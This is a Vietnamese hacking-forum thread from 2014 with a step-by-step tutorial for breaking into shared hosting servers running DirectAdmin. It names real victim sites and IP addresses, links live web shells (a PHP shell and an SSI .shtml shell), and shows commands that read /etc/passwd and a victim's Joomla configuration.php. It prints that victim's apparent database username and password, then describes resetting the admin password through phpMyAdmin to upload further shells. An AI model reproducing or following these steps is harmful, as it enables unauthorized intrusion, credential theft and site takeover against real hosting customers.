[hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

ID Topic: 25876 • Có 1,205 lượt xem
Hình đại diện của thành viên
#1 - @301520
02/03/2014 21:25
Trước tiên là cần shell :
http://hyundaicounty.com/images/vic.php< victoria
Không cần để ý tới hàm nó disable bao nhiêu, nhìn vào cái server là được ( dựa theo kinh nghiệm local )
vào check-host.net > check hyundaicounty.com > info
Sẽ ra : Host name ln03.bsg.vn < nó chạy sv bsg
BSG quẩy tốt, sv chạy direct thì chắc chỉ ngại bkns và powernet ( powernet bởi vì ngày trước mình có contact lỗi này cho bên đấy nên nó fix hết quá nhọ
Bây giờ check quyền Server: - id: () - uid= () gid=603() < đủ quyền
Safe_mode : On < không có quyền thực thi lệnh, nhưng không sao bởi vì đối với những sv chạy direct ta chỉ cần hạ quyền xuống apache, chứ đừng thằng nào dại mà symlink sv chạy direct nhé
Khi đổi sang chạy shell = ip/~user thì nó sẽ tự hạ quyền xuống apache, nhưng chắc chắn sẽ không chạy được shell php hoặc perl, nhưng không sao shtml, html vẫn chạy tốt
Giờ ta up 1 con shell shtml lên, và quẩy thôi
http://123.30.181.39/~otohncom/images/ssi.shtml ?
Kiểm tra quyền : id
Sẽ được : uid=101(apache)gid=501(apache)groups=501(apache),503(access)
Quyền đã được hạ, bây giờ ta dùng dir or cat
dir : lệnh xem thư mục trong linux
cat : lệnh xem file trong linux
Xác định victim thực thi lệnh : cat/etc/passwd hoặc cat/etc/virtual/domainowners < đối với server chạy DA
Ví dụ victim : gvth.net user là : vannhan
ta sử dụng : dir -ao/home/vannhan/domains/gvth.net/public_html < để xem thư mục public_html của victim
Tiếp theo tìm config < chưa user pass database của victim
Victim chạy joomla > config sẽ là > configuration.php
Ta sử dụng : cat/home/vannhan/domains/gvth.net/public_html/configuration.php để view source của file configuration.php
Sẽ ra db là :
var $user = 'vannhan_vannhan';
var $db = 'vannhan_dulieu';
var $password = 'WQUnkOZe';
Bước tiếp theo là connect tới mysql bằng http://123.30.181.39/phpmyadmin< chỉ đối với sv chạy DA mới có nhé
Change pass joomla bằng md5 > login vào admin của victim và upload shell
End Tut
(Nokia 2730c-1)
PM | Trích dẫn | Like bài viết | Sửa | Xóa | Báo cáo | Cảnh cáo
Sửa lần cuối: Ghost 02/03/2014 21:27
------------
Những người đã like Ghost bởi bài viết có ích này:
S2diamon
_______________

Đặng Lê Minh Nguyên


FACEBOOK
Hình đại diện của thành viên
#2 - @301523
02/03/2014 21:28
Thêm tí cho newbie nếu muốn biết sv có chạy DA thì thử xem nó có open port 2222 ko

http://123.30.181.39:2222/
(Nokia 2730c-1)
PM | Trích dẫn | Like bài viết | Sửa | Xóa | Báo cáo | Cảnh cáo
_______________

Đặng Lê Minh Nguyên


FACEBOOK
Hình đại diện của thành viên
#3 - @301551
02/03/2014 21:53
Up top..chẳng ai quan tâm..mất công viết bài
(Nokia 2730c-1)
PM | Trích dẫn | Like bài viết | Sửa | Xóa | Báo cáo | Cảnh cáo
_______________

Đặng Lê Minh Nguyên


FACEBOOK
Trả lời nhanh

Chủ đề tương tự